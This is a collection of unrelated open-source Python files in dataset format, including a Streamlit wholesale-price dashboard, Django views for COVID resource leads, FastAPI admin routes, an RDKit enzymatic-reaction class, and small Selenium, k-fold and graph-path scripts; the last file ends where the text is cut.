correlation_matrix['ALL COMMODITIES'].drop('ALL COMMODITIES')\r\n    top_corr_df = all_comm_correlation_matrix.abs().sort_values(ascending=False)\r\n    top_corr = top_corr_df.head(2)\r\n    st.write(f\"{top_corr.index[0]} has Maximum Correlation with General Trend.\")\r\n    \r\ndef time_series_analysis():\r\n    st.title('Time Series Analysis Page')\r\n\r\n    def decompose_time_series(data, commodity):\r\n        result = seasonal_decompose(data[commodity], model='additive', period=12)\r\n        return result\r\n    \r\n    selected_category_decompose = st.sidebar.selectbox('Select Category for Time Series Decomposition', list(categories_dict.keys()))\r\n    selected_commodity_decompose = st.sidebar.selectbox('Select Commodity for Time Series Decomposition', ['Entire Category'] + list(categories_dict[selected_category_decompose].columns))\r\n\r\n    if selected_commodity_decompose == 'Entire Category':\r\n        decomposed = decompose_time_series(categories_dict[selected_category_decompose], selected_category_decompose)\r\n    else:\r\n        decomposed = decompose_time_series(categories_dict[selected_category_decompose], selected_commodity_decompose)\r\n\r\n    # Plotting the decomposed time series\r\n    st.header(\"Trend: \")\r\n    st.write(\"Trend Analysis helps us identify the long-term movement or direction in the time series data.\")\r\n    st.write(\"It provides insights into whether the data is increasing, decreasing, or stable over time.\")\r\n    st.header(\"Residual: \")\r\n    st.write(\"Residual Analysis examines the differences between observed values and the values predicted by the trend and seasonal components.\")\r\n    st.write(\"It helps us understand the randomness or unexplained variability in the data.\")\r\n    \r\n    st.header(\"Seasonality: \")\r\n    st.write(\"Seasonality Analysis identifies repetitive patterns or cycles in the data that occur at regular intervals.\")\r\n    st.write(\"It helps us understand whether the data exhibits seasonality (repeating patterns) or not.\")\r\n    \r\n    trend_component = decomposed.trend\r\n    plt.figure(figsize=(12,6))\r\n    plt.plot(categories_dict[selected_category_decompose].index, trend_component)\r\n    plt.xlabel('Time')\r\n    plt.ylabel('Trend Component')\r\n    plt.title(f'Trend Analysis of commodity {selected_commodity_decompose} WPI')\r\n    st.pyplot(plt)\r\n    \r\n    \r\n    res_component = decomposed.resid\r\n    plt.figure(figsize=(12,6))\r\n    plt.plot(categories_dict[selected_category_decompose].index, res_component)\r\n    plt.xlabel('Time')\r\n    plt.ylabel('Residual Component')\r\n    plt.title(f'Residual Analysis of commodity {selected_commodity_decompose} WPI')\r\n    st.pyplot(plt)\r\n    \r\n    season_component = decomposed.seasonal\r\n    plt.figure(figsize=(12,6))\r\n    plt.plot(categories_dict[selected_category_decompose].index, season_component)\r\n    plt.xlabel('Time')\r\n    plt.ylabel('Seasonal Component')\r\n    plt.title(f'Seasonality Analysis of commodity {selected_commodity_decompose} WPI')\r\n    st.pyplot(plt)\r\n    \r\n    if selected_commodity_decompose != 'Entire Category':\r\n        seasonality_test_result = 'Stationary' if decomposed.seasonal.dropna().std() < 0.1 else 'Seasonal'\r\n        st.header(f\"The '{selected_commodity_decompose}' commodity is likely {seasonality_test_result}.\")\r\n\r\n    \r\ndef inflation_plot():\r\n    st.title('Overall Inflation Rate Trend')\r\n    monthly_inflation_rate = data['ALL COMMODITIES'].pct_change() * 100\r\n    yearly_inflation_rate = data['ALL COMMODITIES'].pct_change(12) * 100\r\n    yearly_inflation_rate.dropna(inplace=True)\r\n    \r\n    plt.figure(figsize=(10, 6))\r\n    plt.plot(yearly_inflation_rate.index, 
yearly_inflation_rate, label='Yearly General Inflation Rate', color='red')\r\n plt.title('Yearly Inflation Rate Over Time')\r\n plt.xlabel('Time')\r\n plt.ylabel('Inflation Rate (%)')\r\n plt.axhline(0, color='black', linewidth=0.5) # Add horizontal line at y=0\r\n plt.legend(loc='best')\r\n st.pyplot(plt)\r\n \r\ndef time_series_forecasting():\r\n st.title('Time Series Forecasting')\r\n st.write(\"Time series forecasting involves predicting future values based on past data.\")\r\n st.write(\"In this process, the model learns patterns and trends from historical data to make future predictions.\")\r\n\r\n selected_category_tf = st.sidebar.selectbox('Select Category for Time series Forecasting', list(categories_dict.keys()))\r\n selected_commodity_tf = st.sidebar.selectbox('Select Commodity for Time series Forecasting', ['General Index'] + ['Entire Category'] + list(categories_dict[selected_category_tf].columns))\r\n \r\n if selected_commodity_tf == 'General Index':\r\n forecasting_data = data['ALL COMMODITIES'].values\r\n elif selected_commodity_tf == 'Entire Category':\r\n forecasting_data = data[selected_category_tf].values\r\n else:\r\n forecasting_data = data[selected_commodity_tf].values\r\n \r\n forecasting_data = forecasting_data.reshape(-1, 1)\r\n\r\n scaler = MinMaxScaler(feature_range=(0, 1))\r\n data_scaled = scaler.fit_transform(forecasting_data)\r\n\r\n # Create X, y datasets\r\n X, y = [], []\r\n for i in range(10, len(data_scaled)):\r\n X.append(data_scaled[i-10:i, 0])\r\n y.append(data_scaled[i, 0])\r\n\r\n X, y = np.array(X), np.array(y)\r\n\r\n # Reshape X to be [samples, time steps, features]\r\n X = np.reshape(X, (X.shape[0], X.shape[1], 1))\r\n \r\n model = Sequential()\r\n model.add(LSTM(50, input_shape=(X.shape[1], 1)))\r\n model.add(Dense(1))\r\n\r\n model.compile(optimizer='adam', loss='mean_squared_error')\r\n model.fit(X, y, epochs=20, batch_size=1, verbose=2)\r\n \r\n predictions = model.predict(X)\r\n predictions = scaler.inverse_transform(predictions) # Reverting scaling\r\n plt.figure(figsize=(10, 6))\r\n plt.plot(forecasting_data, label='True')\r\n plt.plot(np.arange(10, len(forecasting_data)), predictions, label='Predicted')\r\n plt.legend()\r\n st.pyplot(plt)\r\n \r\n future_steps = 8 # to predict the next three months\r\n input_sequence = X[-1] # the last sequence in the dataset\r\n\r\n predictions_future = []\r\n\r\n for _ in range(future_steps):\r\n # Use last sequence to predict the next value\r\n predicted = model.predict(input_sequence.reshape(1, -1, 1))\r\n\r\n # Append predicted value to the input_sequence\r\n input_sequence = np.append(input_sequence, predicted)\r\n\r\n # Remove the first value of the sequence to maintain the sequence length\r\n input_sequence = input_sequence[1:]\r\n\r\n # Append the predicted value to the list of future predictions\r\n predictions_future.append(scaler.inverse_transform(predicted)[0, 0])\r\n \r\n plt.figure(figsize=(10, 6))\r\n plt.plot(range(len(forecasting_data)), forecasting_data, label='True')\r\n plt.plot(range(len(forecasting_data), len(forecasting_data) + future_steps), predictions_future, label='Forecasted', linestyle='dashed')\r\n plt.legend()\r\n st.pyplot(plt)\r\n \r\n future_direction = \"increase\" if predictions_future[-1] > predictions_future[0] else \"decrease\" if predictions_future[-1] < predictions_future[0] else \"remain the same\" \r\n st.write(f\"The forecasted values for the next coming months are likely to {future_direction}.\")\r\n \r\n \r\ndef home_page():\r\n # Create a Streamlit app 
title\r\n st.title(\"Wholesale Price Index Dataset Advanced Data Analysis\")\r\n # Heading for WPI Definition\r\n st.header(\"Definition of Wholesale Price Index (WPI)\")\r\n st.write(\"The Wholesale Price Index (WPI) is a measure of the average change in the prices of a basket of goods and services typically traded in bulk at the wholesale level. It is used to track inflation and economic trends.\")\r\n st.write(\"The formula for calculating the WPI is as follows:\")\r\n st.latex(r'WPI = \\frac{\\sum(P_{i} \\cdot W_{i})}{\\sum(W_{i})}')\r\n \r\n # Bullet Points for Interpretation\r\n st.header(\"Interpreting WPI Data\")\r\n st.write(\"You can interpret WPI data in the following ways:\")\r\n st.markdown(\"- **Inflation Analysis**: WPI helps in monitoring inflation trends by tracking changes in wholesale prices over time.\")\r\n st.markdown(\"- **Economic Trends**: WPI data can provide insights into the overall health of the economy, as rising prices may indicate economic growth or overheating.\")\r\n st.markdown(\"- **Sector-Specific Analysis**: WPI can be used to analyze price movements in specific sectors, helping businesses and policymakers make informed decisions.\")\r\n\r\n st.header(\"Sample Data (First 5 Rows)\")\r\n st.dataframe(data.head(5))\r\n \r\n heatmap_page1()\r\n clustering_page()\r\n \r\ndef main():\r\n st.sidebar.title('Navigation')\r\n pages = {\r\n \"Home Page\":home_page,\r\n \"Trend Visualization\": trend_visualization_page,\r\n \"Calculate Volatility\": calculate_volatility_page,\r\n \"Correlation Analysis\": correlation_analysis_commodity,\r\n \"Inflation Analysis\": monthy_yearly_rate_change_analysis,\r\n \"Timeseries Analysis\": time_series_analysis,\r\n \"Timeseries Forecasting\":time_series_forecasting\r\n }\r\n \r\n selected_page = st.sidebar.radio(\"Go to\", list(pages.keys()))\r\n pages[selected_page]()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"SurajB52/cpi_and_wpi_visualization","sub_path":"wpi_dashboard_v2.py","file_name":"wpi_dashboard_v2.py","file_ext":"py","file_size_in_byte":20630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31292274439","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nservice_object = Service(\"C:\\Drivers\\chromedriver.exe\")\nbrowser = webdriver.Chrome(service= service_object)\nbrowser.get(\"https://www.google.com/\")\nprint(browser.title)\nurl1 = browser.title\nprint(browser.current_url)\nurl = browser.current_url\nif url == url1:\n print(\"url is correct\")\nelse:\n print(\"bad\")\n\n","repo_name":"halovivek/yearcoding","sub_path":"07092022_selenium2.py","file_name":"07092022_selenium2.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31369738367","text":"from django.http.response import Http404\nfrom django.shortcuts import HttpResponse\nfrom .models import NeedType, Lead, State, District\nfrom covid.renderer import renderView\nimport gspread\nimport json\nfrom covid import env\nfrom fuzzywuzzy import process\n\n\ndef getState(state):\n state_list = State.objects.values_list(\"name\")\n state_list = [i[0] for i in state_list]\n Ratios = process.extract(state, state_list)\n finalvalue = max(Ratios, key=lambda x: x[1])\n stateobj = State.objects.get(name=finalvalue[0])\n return stateobj\n\n\ndef getDistrict(district):\n district_list = District.objects.values_list(\"name\")\n district_list = [i[0] 
for i in district_list]\n Ratios = process.extract(district, district_list)\n finalvalue = max(Ratios, key=lambda x: x[1])\n if(finalvalue[1] < 80):\n return False\n districtobj = District.objects.get(name=finalvalue[0])\n return districtobj\n\n\ndef index(request):\n needs = NeedType.objects.all()\n return renderView(request, 'needs.html', {\"needs\": needs})\n\n\ndef needs(request, need=None):\n try:\n itemFrom = int(request.POST['from'])-1\n itemTo = int(request.POST['till'])\n if itemTo < 10:\n itemTo = 10\n except:\n itemFrom = 0\n itemTo = 10\n try:\n needobj = NeedType.objects.get(id=need)\n if needobj.mapsrc:\n return renderView(request, 'leads.html', {\n 'need': needobj\n })\n states = []\n districts = []\n resources = []\n try:\n statename = str(request.GET['state'])\n state = State.objects.get(name=statename)\n except:\n states = State.objects.all()\n state = None\n\n district = None\n if state:\n districts = District.objects.filter(state=state)\n try:\n distname = str(request.GET['district'])\n district = districts.get(name=distname)\n except:\n district = None\n\n if district:\n resources = Lead.objects.filter(needtype=needobj, state=state, district=district).order_by(\n '-lastupdate')[itemFrom:itemTo]\n totalleads = Lead.objects.filter(\n needtype=needobj, state=state, district=district).count()\n elif state:\n resources = Lead.objects.filter(needtype=needobj, state=state).order_by(\n '-lastupdate')[itemFrom:itemTo]\n totalleads = Lead.objects.filter(\n needtype=needobj, state=state).count()\n else:\n resources = Lead.objects.filter(needtype=needobj).order_by(\n '-lastupdate')[itemFrom:itemTo]\n totalleads = Lead.objects.filter(needtype=needobj).count()\n\n if itemTo > totalleads:\n itemTo = totalleads\n data = {\n 'leads': resources,\n 'need': needobj,\n \"states\": states,\n \"districts\": districts,\n \"state\": state,\n \"district\": district,\n \"from\": itemFrom+1,\n \"till\": itemTo,\n \"totalleads\": totalleads\n }\n return renderView(request, 'leads.html', data)\n except:\n raise Http404()\n\n\ndef addwithDistrict(sr_no, district, state, need, lead):\n if(sr_no.strip() != \"\"):\n uuid = lead[\"UUID\"]\n if(uuid.strip() == \"\"):\n oxygenobj = Lead.objects.create(\n needtype=need, provider=lead[\"Provider\"], contact=lead[\"Contact\"], state=state, district=district, address=lead[\"Address\"], name=lead[\"Name\"])\n oxygenobj.save()\n return oxygenobj, True\n else:\n try:\n oxygenobj = Lead.objects.get(id=uuid)\n oxygenobj.needtype = need\n oxygenobj.provider = lead[\"Provider\"]\n oxygenobj.contact = lead[\"Contact\"]\n oxygenobj.state = state\n oxygenobj.district = district\n oxygenobj.address = lead[\"Address\"]\n oxygenobj.save()\n return oxygenobj, False\n except:\n return False, False\n\n\ndef addwithoutDistrict(sr_no, state, need, lead):\n obj = getState(state)\n if(obj != False):\n state = obj\n if(sr_no.strip() != \"\"):\n uuid = lead[\"UUID\"]\n if(uuid.strip() == \"\"):\n oxygenobj = Lead.objects.create(\n needtype=need, provider=lead[\"Provider\"], contact=lead[\"Contact\"], state=state, address=lead[\"Address\"], name=lead[\"Name\"])\n oxygenobj.save()\n return oxygenobj, True\n else:\n try:\n oxygenobj = Lead.objects.get(id=uuid)\n oxygenobj.needtype = need\n oxygenobj.provider = lead[\"Provider\"]\n oxygenobj.contact = lead[\"Contact\"]\n oxygenobj.state = state\n oxygenobj.address = lead[\"Address\"]\n oxygenobj.save()\n return oxygenobj, False\n except:\n return False, False\n\n\ndef delRajat():\n objs = Lead.objects.filter(provider=\"Rajat Air 
Products\")\n for i in objs:\n i.delete()\n\n\ndef addLeads(request):\n output_list = []\n try:\n key = request.GET[\"key\"]\n if(str(key) != str(env.PROJECTKEY)):\n return Http404()\n except:\n return Http404()\n print(\"Processing data retrieval\")\n newlyadded = 0\n updated = 0\n try:\n gc = gspread.service_account(filename=env.GOOGLE_CRED)\n sh = gc.open_by_key(env.SPREADSHEETID)\n need_types = NeedType.objects.all()\n for need in need_types:\n try:\n Worksheet = sh.worksheet(need.type.capitalize())\n output_list.append(f\"Worksheet found: {need.type}\")\n except:\n output_list.append(f\"Worksheet not found: {need.type}\")\n continue\n res = Worksheet.get_all_records()\n for i in res:\n sr_no = str(i[\"Sr. No.\"])\n try:\n if(i[\"District\"].strip() == \"\"):\n raise Exception\n districts = str(i[\"District\"]).split(\",\")\n for dis in districts:\n obj = getDistrict(dis)\n if(obj == False):\n newobj, is_added = addwithoutDistrict(\n sr_no, i[\"State\"], need, i)\n if newobj:\n Worksheet.update_cell(\n int(sr_no)+1, 2, str(newobj.id))\n if(is_added):\n output_list.append(\n f'Record created: {newobj.provider} : {need.type}')\n newlyadded += 1\n else:\n output_list.append(\n f\"Record updated: {newobj.provider} : {need.type}\")\n updated += 1\n else:\n district, state = obj, obj.state\n\n newobj, is_added = addwithDistrict(\n sr_no, district, state, need, i)\n if newobj:\n Worksheet.update_cell(\n int(sr_no)+1, 2, str(newobj.id))\n if(is_added):\n output_list.append(\n f'Record created: {newobj.provider} : {need.type}')\n newlyadded += 1\n else:\n output_list.append(\n f\"Record updated: {newobj.provider} : {need.type}\")\n updated += 1\n except Exception as e:\n print(e)\n states = str(i[\"State\"]).split(\",\")\n for sts in states:\n newobj, is_added = addwithoutDistrict(\n sr_no, sts, need, i)\n if newobj:\n Worksheet.update_cell(\n int(sr_no)+1, 2, str(newobj.id))\n if(is_added):\n output_list.append(\n f'Record created: {newobj.provider} : {need.type}')\n newlyadded += 1\n else:\n output_list.append(\n f\"Record updated: {newobj.provider} : {need.type}\")\n updated += 1\n\n except Exception as e:\n print(e)\n output_list.append(\"Some error occured\")\n response = \",\".join(i for i in output_list)\n print(*(response.split(\",\")), sep=\"\\n\")\n return HttpResponse(response)\n\n\ndef fetchState(request):\n state = list(State.objects.values_list(\"name\", flat=True))\n print(state)\n return HttpResponse(json.dumps(state))\n","repo_name":"Knotters/covidcare","sub_path":"needs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9281,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"21997103127","text":"from pydantic import BaseModel, Field\nfrom fastapi.encoders import jsonable_encoder\n\nmock_db: dict[int, object] = {}\n\n\nclass Item(BaseModel):\n id: int | None\n name: str | None = Field(title=\"The name of the item\",\n max_length=100, min_length=1)\n description: str | None = Field(\n default=None, title=\"The description of the item\",\n max_length=300, min_length=1\n )\n\n class Config:\n schema_extra = {\n \"example\": {\n \"name\": \"foo\",\n \"description\": \"bar\",\n }\n }\n\n\nclass Repo:\n def __init__(self) -> None:\n self.counter: int = 0\n\n def create(self, item: Item):\n self.counter += 1\n item.id = self.counter\n mock_db[self.counter] = jsonable_encoder(item)\n return item\n\n def get(self, id: int):\n return Item(**mock_db.get(id, {}))\n\n def update(self, id: int, item: Item):\n 
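# Pydantic partial-update idiom: overlay only the fields the client actually sent (exclude_unset) onto the stored item\n        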
current_val = Item(**mock_db[id])\n update_data = item.dict(exclude_unset=True)\n updated_val = current_val.copy(update=update_data)\n print(current_val)\n print(updated_val)\n mock_db[id] = jsonable_encoder(updated_val)\n return updated_val\n\n def delete(self, id: int):\n return Item(**mock_db.pop(id, {}))\n\n\ndb = Repo()\n","repo_name":"dotdak/example","sub_path":"fast-api-template/src/repo/item_repo.py","file_name":"item_repo.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27823489800","text":"\"\"\"Enzymatic reaction representation.\"\"\"\nimport re\nfrom typing import List, Any\nfrom .chemical_reaction import ChemicalReaction\nfrom rdkit.Chem import AllChem as rdk\nfrom rdkit.Chem.rdchem import Mol\n\nUNKNOWN_CHEMICAL_REGEX = re.compile(r\"^(<.*>)$|^(<)|(>)$\")\n\n\nclass EnzymaticReaction(ChemicalReaction):\n \"\"\"Representation of an enzymatic reaction.\n\n Reactions containing enzyme are represented as reaction SMILES using a '|'\n to separate precursors from the EC number.\n \"\"\"\n\n def __init__(\n self,\n enzymatic_reaction_smiles: str,\n remove_duplicates: bool = True,\n sanitize: bool = True,\n source: str = \"unknown\",\n **kwargs: Any,\n ):\n \"\"\"Constructor for EnzymaticReaction.\n\n Args:\n enzymatic_reaction_smiles: an enzymatic reaction SMILES.\n remove_duplicates: duplicate removal. Defaults to True.\n sanitize: whether sanitization is enabled. Defaults to True.\n source: source for the enzymatic reaction. Defaults to \"unknown\".\n \"\"\"\n vals = re.split(r\">|\\|\", enzymatic_reaction_smiles)\n if len(vals) < 2:\n vals.append(\"\")\n\n self.ec: List[str] = [level.strip() for level in vals[1].split(\".\")]\n self.source = source\n\n # hack\n self.kwargs = kwargs\n\n super().__init__(\n enzymatic_reaction_smiles.replace(f\"|{vals[1]}\", \"\"),\n remove_duplicates,\n sanitize,\n **kwargs,\n )\n\n def __str__(self) -> str:\n \"\"\"Returns the extended reaction SMARTS of this instance (reactants|ec>agents>products).\n\n Returns:\n the extended reaction SMARTS representing this instance.\n \"\"\"\n s = (\n \".\".join(\n sorted([rdk.MolToSmiles(m, **self.kwargs) for m in self.reactants if m])\n )\n + \">\"\n + \".\".join(\n sorted([rdk.MolToSmiles(m, **self.kwargs) for m in self.agents if m])\n )\n + \">\"\n + \".\".join(\n sorted([rdk.MolToSmiles(m, **self.kwargs) for m in self.products if m])\n )\n )\n s_parts = s.split(\">\")\n\n if len(self.ec) > 0 and self.ec[0] != \"\":\n s_parts[0] += f'|{\".\".join(self.ec)}'\n return \">\".join(s_parts).replace(\" \", \"\")\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Compares the count, order, and SMILES string of each molecule in this reaction as well as the EC.\n\n Args:\n other: another EnzymaticReaction instance to be compared with this instance.\n\n Returns:\n whether this instance is equal to another.\n \"\"\"\n if not isinstance(other, EnzymaticReaction):\n raise NotImplementedError(\n \"EnzymaticReaction can be tested for equality with EnzymaticReaction objects\"\n )\n return super().__eq__(other) and self.ec == other.ec\n\n def __hash__(self) -> int:\n \"\"\"Get hash for the enzymatic reaction.\n\n Returns:\n enzymatic reaction hash.\n \"\"\"\n return hash(str(self))\n\n def mol_to_smiles(self, mol: Mol) -> str:\n \"\"\"Applies the kwargs supplied to the reaction to MolToSmiles for a given molecule.\n\n Args:\n mol: an RDKit molecule instance.\n\n Returns:\n the string representing the molecule.\n 
\"\"\"\n return rdk.MolToSmiles(mol, **self.kwargs)\n\n def to_string(self, ec_depth: int = 4) -> str:\n \"\"\"Get the string representing this reaction with a certain number of EC levels.\n\n Args:\n ec_depth: the number of EC classes to include (top-down). Defaults to 4.\n\n Returns:\n the string representing this reaction with the chosen levels of EC.\n \"\"\"\n cpy = EnzymaticReaction(str(self))\n cpy.ec = cpy.ec[:ec_depth]\n return str(cpy).strip()\n\n def get_ec(self, ec_depth: int = 4) -> str:\n \"\"\"Get the string representing the EC of this reaction.\n\n Args:\n ec_depth: the number of EC classes to include (top-down). Defaults to 4.\n\n Returns:\n the EC of the reaction as a string.\n \"\"\"\n return \".\".join(self.ec[:ec_depth]).strip()\n\n def reverse(self) -> \"EnzymaticReaction\":\n \"\"\"Reverses the reaction (switching reactants and products).\n\n Returns:\n the reversed enzymatic reactions.\n \"\"\"\n return EnzymaticReaction.from_smarts_and_ec(\n f\"{'.'.join(self.get_products_as_smiles())}>>{'.'.join(self.get_reactants_as_smiles())}\",\n self.get_ec(),\n self.source,\n )\n\n @staticmethod\n def from_smarts_and_ec(\n reaction_smiles: str, ec: str, source: str = \"unknown\"\n ) -> \"EnzymaticReaction\":\n \"\"\"Creates an EnzymaticReaction instance from a reaction SMILES and an EC number.\n\n Args:\n reaction_smiles: a reaction SMILES.\n ec: EC number string representation.\n source: source for the enzymatic reaction. Defaults to \"unknown\".\n\n Returns:\n an EnzymaticReaction instance.\n \"\"\"\n split = reaction_smiles.split(\">>\")\n return EnzymaticReaction(split[0] + \"|\" + ec + \">>\" + split[1], source=source)\n\n @staticmethod\n def is_valid(enzymatic_reaction_smiles: str) -> bool:\n \"\"\"Checks whether an enzymatic reaction SMILES (e.g. 
O.CO|1.2.3.4>>C(=O)O) is valid.\n\n        Args:\n            enzymatic_reaction_smiles: an enzymatic reaction SMILES.\n\n        Returns:\n            a bool indicating whether the supplied enzymatic reaction SMILES is valid.\n        \"\"\"\n        if (\n            \"|\" not in enzymatic_reaction_smiles\n            or enzymatic_reaction_smiles.count(\">\") != 2\n            or \"|>>\" in enzymatic_reaction_smiles\n        ):\n            return False\n\n        return True\n","repo_name":"rxn4chemistry/biocatalysis-model","sub_path":"rxn_biocatalysis_tools/enzymatic_reaction.py","file_name":"enzymatic_reaction.py","file_ext":"py","file_size_in_byte":5889,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"77"} +{"seq_id":"13082166108","text":"import pandas as pd\nfrom sklearn import model_selection\n\n# k-fold cross-validation\nif __name__ == \"__main__\":\n    train_path = './wine-quality.tsv'\n    df = pd.read_csv(train_path, sep='\\t')\n\n    # Create a \"kfold\" column and initialize it with -1\n    df[\"kfold\"] = -1\n\n    # Shuffle the rows\n    df = df.sample(frac=1).reset_index(drop=True)\n\n    # Initialize the KFold class (n_splits sets the number of splits)\n    kf = model_selection.KFold(n_splits=5)\n\n    # Fill in the kfold column\n    for fold, [trn_, val_] in enumerate(kf.split(X=df)):\n        df.loc[val_, 'kfold'] = fold\n\n    # Save the dataset together with the new column\n    df.to_csv(\"train_folds.tsv\", index=False, sep='\\t')\n","repo_name":"unvalley/dnn-for-nlp","sub_path":"AMLP/cross-validation/kfold.py","file_name":"kfold.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32820086788","text":"import json\nimport tensorflow as tf\nfrom keras.models import load_model\nimport pickle\n\n\n# load the trained model\nmodel = load_model('chat_model')\n\n# load the training data\nwith open('intents.json') as file:\n    data = json.load(file)\n\ntraining_sentences = []\ntraining_labels = []\nfor intent in data['intents']:\n    for pattern in intent['patterns']:\n        training_sentences.append(pattern)\n        training_labels.append(intent['tag'])\n\n# encode the training labels\nwith open('label_encoder.pickle', 'rb') as ecn_file:\n    lbl_encoder = pickle.load(ecn_file)\n\ntraining_labels_encoded = lbl_encoder.transform(training_labels)\n\n# tokenize and pad the training sentences\nwith open('tokenizer.pickle', 'rb') as handle:\n    tokenizer = pickle.load(handle)\n\nsequences = tokenizer.texts_to_sequences(training_sentences)\npadded_sequences = tf.keras.utils.pad_sequences(sequences, truncating='post', maxlen=20)\n\n# evaluate the model\nloss, accuracy = model.evaluate(padded_sequences, training_labels_encoded)\n\n# print the accuracy\nprint('Accuracy:', accuracy)\n","repo_name":"S-Thakas/MentalHealth","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72990374010","text":"from fastapi import APIRouter, Depends\n\nfrom app.models.schemas.auth import ChangedPasswordIn\nfrom app.models.schemas.suggestions import SuggestionsForApprove\nfrom app.models.schemas.users import User, UserDataToUpdate, UserList\nfrom app.services.admin import AdminService\nfrom app.utils.deps import get_current_admin_user, pagination\nfrom app.utils.utils import propagate_args\n\nrouter = APIRouter()\n\n\n@router.get(\n    \"/user/{user_id}\",\n    response_model=User,\n    dependencies=[Depends(get_current_admin_user)],\n)\nasync def get_user(\n    
user_id: int,\n service: AdminService = Depends(),\n):\n return await service.get_user_by_id(user_id)\n\n\n@router.get(\"/users\", response_model=UserList)\nasync def get_user_list(\n service: AdminService = Depends(), user: User = Depends(get_current_admin_user)\n):\n return await service.get_all_users(user)\n\n\n@router.delete(\n \"/users/{user_id}/delete\",\n dependencies=[Depends(get_current_admin_user)],\n)\nasync def delete_user(\n user_id: int,\n service: AdminService = Depends(),\n):\n uid = await service.delete_user(user_id)\n if uid:\n return {\"status\": \"Ok\"}\n else:\n return {\"status\": \"error\"}\n\n\n@router.put(\n \"/users/{user_id}/update\",\n dependencies=[Depends(get_current_admin_user)],\n)\nasync def update_user(\n user_id: int,\n user_data_to_update: UserDataToUpdate,\n service: AdminService = Depends(),\n):\n uid = await service.update_user(user_id, user_data_to_update)\n if uid:\n return {\"status\": \"Ok\"}\n else:\n return {\"status\": \"error\"}\n\n\n@router.put(\n \"/suggestions/{suggestions_id}/approve\",\n)\nasync def approve_review_suggestions(\n suggestions_id: int,\n service: AdminService = Depends(),\n user: User = Depends(get_current_admin_user),\n):\n sid = await service.approve_suggestion(suggestions_id, user)\n if sid:\n return {\"status\": \"Ok\"}\n else:\n return {\"status\": \"error\"}\n\n\n@router.put(\n \"/suggestions/{suggestions_id}/reject\",\n)\nasync def reject_review_suggestions(\n suggestions_id: int,\n service: AdminService = Depends(),\n user: User = Depends(get_current_admin_user),\n):\n sid = await service.reject_suggestion(suggestions_id, user)\n if sid:\n return {\"status\": \"Ok\"}\n else:\n return {\"status\": \"error\"}\n\n\n@router.get(\n \"/suggestions\",\n response_model=SuggestionsForApprove,\n response_model_exclude_unset=True,\n dependencies=[Depends(get_current_admin_user)],\n)\nasync def get_suggestions(\n common_args: dict = Depends(pagination),\n service: AdminService = Depends(),\n user: User = Depends(get_current_admin_user),\n):\n data, total = await service.get_all_suggestions(user, common_args)\n resp = {\"data\": data, \"total\": total}\n propagate_args(common_args, resp)\n return resp\n\n\n@router.put(\n \"/users/{users_id}/changePassword\",\n dependencies=[Depends(get_current_admin_user)],\n)\nasync def change_user_password(\n users_id: int,\n changed_password: ChangedPasswordIn,\n service: AdminService = Depends(),\n):\n uid = await service.change_user_password(users_id, changed_password)\n if uid:\n return {\"status\": \"Ok\"}\n else:\n return {\"status\": \"error\"}\n","repo_name":"blayson/sre","sub_path":"app/routes/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8078962365","text":"import itertools\nimport operator\nimport copy\n\nglobal a\na=0\nglobal pa\npa=[]\n\ndef readData(fname):\n\tdata=[]\n\twith open(fname) as f:\n\t\tfor l in f.readlines():\n\t\t\tif l[-1]=='\\n':\n\t\t\t\tl=l[:-1]\n\n\t\t\tl=l.split('-')\n\t\t\tdata.append((l[0],l[1]))\n\treturn data\n\ndef findNodePaths(tunnels):\n\tnodePaths={}\n\tfor x in tunnels:\n\t\tnode=nodePaths[x[0]]=nodePaths.get(x[0],set())\n\t\tnode.add(x[1])\n\n\t\tnode=nodePaths[x[1]]=nodePaths.get(x[1],set())\n\t\tnode.add(x[0])\n\treturn nodePaths\n\ndef checkPaths(start, nodePaths, visited):\n\tvisited=copy.deepcopy(visited)\n\tif not all(ele.isupper() for ele in start\t):\n\t\tvisited.add(start)\n\tif start=='end':\n\t\tglobal 
a\n\t\ta+=1\n\t\treturn\n\tfor n in nodePaths[start]:\n\t\tif n in visited:\n\t\t\tcontinue\n\t\tcheckPaths(n, nodePaths, visited)\n\ndef checkPaths2(start, nodePaths, visited,sm,path,twice=False):\n\t#print(start,visited, twice)\n\tvisited=copy.deepcopy(visited)\n\tpath=copy.deepcopy(path)\n\tpath.append(start)\n\tif not all(ele.isupper() for ele in start\t):\n\t\tif not twice and start==sm:\n\t\t\ttwice=True\n\t#\t\tprint(\"twice: \",start)\n\t\telse:\n\t\t\tvisited.add(start)\n\t\t\n\t\tif start=='end':\n\t\t\tvisited.add(start)\n\n\tif start=='end':\n\t#\tprint(\"DONE\",path)\n\t\tglobal a\n\t\ta+=1\n\t\tpa.append(path)\n\t\tcheckPaths2.twice=False\n\t\treturn\n\tfor n in nodePaths[start]:\n\t\tif n in visited:\n\t\t\tcontinue\n\t\tcheckPaths2(n, nodePaths, visited,sm,path,twice)\n\n\ntunnels=readData('in.txt')\nnodePaths=findNodePaths(tunnels)\n\nfor n in nodePaths['start']:\n\tcheckPaths(n, nodePaths, set(['start']))\n\nprint(a)\na=0\n\nsmall =[]\nfor x in nodePaths:\n\tif not all(ele.isupper() for ele in x) and x!='start' and x!='end':\n\t\tsmall.append(x)\n\nfor n in nodePaths['start']:\n\tfor s in small:\n\t\tcheckPaths2(n, nodePaths, set(['start']),s,[])\n\n#to remove double-counted 